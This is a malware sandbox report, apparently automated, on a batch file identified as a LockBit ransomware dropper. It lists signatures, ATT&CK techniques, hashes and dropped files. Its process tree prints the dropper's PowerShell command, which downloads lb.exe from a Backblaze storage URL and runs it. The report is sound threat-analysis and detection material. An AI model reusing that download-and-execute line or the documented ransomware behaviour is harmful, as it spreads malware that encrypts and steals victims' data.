lockbit | 269a98ecf1766f39c6ed52aedda0f97276a8b1ec0e5e824d30fd40c3a67a8897

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
10-07-2024 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bat.bat
Size

306B
MD5

b356ccb6be21d42492bb19158842f90c
SHA1

e79f4a517f48a992dedb66df06bb57606d86588e
SHA256

269a98ecf1766f39c6ed52aedda0f97276a8b1ec0e5e824d30fd40c3a67a8897
SHA512

52422b3fbe34dec6f54366388d20964812bb038f900fc00f80875b1f1d0427470d23bd7a62c7ae068f1cbb795877f0ce32dd00dc868a258a16a3a92b5610b002

Score

10^/10

lockbit execution ransomware spyware stealer

Malware Config

Signatures

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x00030000000229c8-18.dat	family_lockbit

Renames multiple (660) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
2	1620	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
1620	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2017.tmp

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	2017.tmp

Executes dropped EXE 2 IoCs

Processes:

lb.exe2017.tmp

pid	Process
2632	lb.exe
3596	2017.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 2 IoCs

Processes:

lb.exe

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1705699165-553239100-4129523827-1000\desktop.ini	lb.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1705699165-553239100-4129523827-1000\desktop.ini	lb.exe

Drops file in System32 directory 4 IoCs

Processes:

splwow64.exeprintfilterpipelinesvc.exe

description	ioc	Process
File created	C:\Windows\system32\spool\PRINTERS\00002.SPL	splwow64.exe
File created	C:\Windows\system32\spool\PRINTERS\PPuzs2i48c9kcx0t61_v_6k32yb.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPyirtg76nq9fjhq1ewi3_nj57c.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PPh4nxm4tgbdg1ahozvoevuwb1d.TMP	printfilterpipelinesvc.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

2017.tmp

pid	Process
3596	2017.tmp
3596	2017.tmp
3596	2017.tmp
3596	2017.tmp
3596	2017.tmp
3596	2017.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ONENOTE.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ONENOTE.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

ONENOTE.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	ONENOTE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	ONENOTE.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exelb.exe

pid	Process
1620	powershell.exe
1620	powershell.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe
2632	lb.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

lb.exe

pid	Process
2632	lb.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exelb.exe

description	pid	Process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeDebugPrivilege	2632	lb.exe
Token: 36	2632	lb.exe
Token: SeImpersonatePrivilege	2632	lb.exe
Token: SeIncBasePriorityPrivilege	2632	lb.exe
Token: SeIncreaseQuotaPrivilege	2632	lb.exe
Token: 33	2632	lb.exe
Token: SeManageVolumePrivilege	2632	lb.exe
Token: SeProfSingleProcessPrivilege	2632	lb.exe
Token: SeRestorePrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSystemProfilePrivilege	2632	lb.exe
Token: SeTakeOwnershipPrivilege	2632	lb.exe
Token: SeShutdownPrivilege	2632	lb.exe
Token: SeDebugPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeBackupPrivilege	2632	lb.exe
Token: SeSecurityPrivilege	2632	lb.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

ONENOTE.EXE

pid	Process
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE
4356	ONENOTE.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exelb.exeprintfilterpipelinesvc.exe2017.tmp

description	pid	Process	procid_target
PID 3888 wrote to memory of 1620	3888	cmd.exe	84
PID 3888 wrote to memory of 1620	3888	cmd.exe	84
PID 3888 wrote to memory of 2632	3888	cmd.exe	87
PID 3888 wrote to memory of 2632	3888	cmd.exe	87
PID 3888 wrote to memory of 2632	3888	cmd.exe	87
PID 2632 wrote to memory of 1880	2632	lb.exe	90
PID 2632 wrote to memory of 1880	2632	lb.exe	90
PID 2632 wrote to memory of 3596	2632	lb.exe	94
PID 2632 wrote to memory of 3596	2632	lb.exe	94
PID 2632 wrote to memory of 3596	2632	lb.exe	94
PID 2632 wrote to memory of 3596	2632	lb.exe	94
PID 3360 wrote to memory of 4356	3360	printfilterpipelinesvc.exe	95
PID 3360 wrote to memory of 4356	3360	printfilterpipelinesvc.exe	95
PID 3596 wrote to memory of 5816	3596	2017.tmp	101
PID 3596 wrote to memory of 5816	3596	2017.tmp	101
PID 3596 wrote to memory of 5816	3596	2017.tmp	101

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://f004.backblazeb2.com/b2api/v1/b2_download_file_by_id?fileId=4_z91af74acda9d97d09c090616_f1112212a7aa57525_d20240710_m181411_c004_v0402023_t0026_u01720635251213' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lb.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Users\Admin\AppData\Local\Temp\lb.exe
  "C:\Users\Admin\AppData\Local\Temp\lb.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\splwow64.exe
    C:\Windows\splwow64.exe 12288
    3⤵
    - Drops file in System32 directory
    PID:1880
- - C:\ProgramData\2017.tmp
    "C:\ProgramData\2017.tmp"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\2017.tmp >> NUL
      4⤵
      PID:5816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:2252

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3360
- C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
  /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{F1E32052-39F0-4C03-9102-85E6DF996A95}.xps" 133651111180310000
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-1705699165-553239100-4129523827-1000\AAAAAAAAAAA

Filesize
129B

MD5
6214d7adb98dcee1194427466dd86651

SHA1
557e896e11097a4f15fba47951501f99a4e6049b

SHA256
2a22e2eafd67edcadb6211e1c2a64a3d0314e2b07484cfda765b59596b338825

SHA512
27b6f485264c24d2851d296339cccf50bcd54db321d7376347f25fdd22105aaa3c669b28729a292f690d059ecda592ae9f10399f0f9bc7516752ffb048f49c7f

Download Submit
C:\9VxIDly04.README.txt

Filesize
289B

MD5
343cf231bf640aee5079dafeac910456

SHA1
986593eb26aac8592140bc47a677d3a849fd37c6

SHA256
e191e18d1f27b1312b9f9599867b4b2bd99ede3af66b50cf91c45300ca49740c

SHA512
308507c924fffa902a70343730c416c2d5e19e2958326a90640893a9559ba1e894d17f2e44dcb0b1d9b3b2dd3e3c0e5b9d13c659b90238fc4d497cccd1ca1185

Download Submit
C:\ProgramData\2017.tmp

Filesize
14KB

MD5
294e9f64cb1642dd89229fff0592856b

SHA1
97b148c27f3da29ba7b18d6aee8a0db9102f47c9

SHA256
917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

SHA512
b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\HHHHHH

Filesize
145KB

MD5
ce11045b1de7b6116bfecad7f17be7bc

SHA1
093c8eba20166b14e78f34e49f5784f6c936287d

SHA256
762fa04dc7b2db97d9bcd4cf867a4f5eb2f91c22dfa3b098cc6e67af4ea2809a

SHA512
ba62650525c6f8cc0f20c1585245245146133433899df7bb041136b58fbf741e8627683f7f9101d796ab980895549656b5f629eb32117a3e004c552db3833aec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bf4d4dbp.4oe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lb.exe

Filesize
145KB

MD5
0698cdd7f9b368e45a1180c88ad87aa0

SHA1
3d6f7d44ac1ee1125526ceaba6a9f28cf80d9de2

SHA256
7e7505d1be3d0e23af4d995768260d8200a7cc980e1e2ac359288779c9d18cd8

SHA512
d21d947537e8556083efff317f6030b7c442a5199a1172e916a99ea6ea89478ae8438183715b939ca494d3b653c551a7efee33005fc8e423f1bdd1689bedd820

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Filesize
4KB

MD5
bbcc92d44c730d56c4fd54c7087e497b

SHA1
b1b3c84e1e371e62639215e1f260402a8b0e1389

SHA256
60d5132470100e14c969f43641cc4939f05f62573f3afefa55faa3da93b511f1

SHA512
a05ca453f892512ec0d81f961b4e8b0977beb529dcedeb293a6a4937c2d4eca2fec6cf3ec868760e258d93c95f9000d7799db05df166416501d580d90edd1249

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-1705699165-553239100-4129523827-1000\DDDDDDDDDDD

Filesize
129B

MD5
a551019bda67b491dcb7a9a6dd9fe54b

SHA1
918e236f8bfd913021cec83ff3b26e9ce8b6af50

SHA256
91d71ccf74738235286bd54b1af558d0831136dfb0ef06c663bfa6c90c70e48c

SHA512
a754f405a53fc7ec0ca4892a3baeff56b0ac5c2c21f72c3997b0fb6f80b9123925071badac69128382ec05b7aec72808dcedcb8dd90405f3dcaf1397e2e99fe9

Download Submit
memory/1620-16-0x00007FFA274D0000-0x00007FFA27F91000-memory.dmp

Filesize
10.8MB

Download
memory/1620-7-0x0000027F77260000-0x0000027F77282000-memory.dmp

Filesize
136KB

Download
memory/1620-0-0x00007FFA274D3000-0x00007FFA274D5000-memory.dmp

Filesize
8KB

Download
memory/1620-12-0x00007FFA274D0000-0x00007FFA27F91000-memory.dmp

Filesize
10.8MB

Download
memory/1620-11-0x00007FFA274D0000-0x00007FFA27F91000-memory.dmp

Filesize
10.8MB

Download
memory/2632-21-0x0000000003430000-0x0000000003440000-memory.dmp

Filesize
64KB

Download
memory/2632-22-0x0000000003430000-0x0000000003440000-memory.dmp

Filesize
64KB

Download
memory/2632-20-0x0000000003430000-0x0000000003440000-memory.dmp

Filesize
64KB

Download
memory/4356-3059-0x00007FFA057F0000-0x00007FFA05800000-memory.dmp

Filesize
64KB

Download
memory/4356-3072-0x00007FFA057F0000-0x00007FFA05800000-memory.dmp

Filesize
64KB

Download
memory/4356-3071-0x00007FFA057F0000-0x00007FFA05800000-memory.dmp

Filesize
64KB

Download
memory/4356-3069-0x00007FFA057F0000-0x00007FFA05800000-memory.dmp

Filesize
64KB

Download
memory/4356-3073-0x00007FFA03430000-0x00007FFA03440000-memory.dmp

Filesize
64KB

Download
memory/4356-3074-0x00007FFA03430000-0x00007FFA03440000-memory.dmp

Filesize
64KB

Download
memory/4356-3070-0x00007FFA057F0000-0x00007FFA05800000-memory.dmp

Filesize
64KB

Download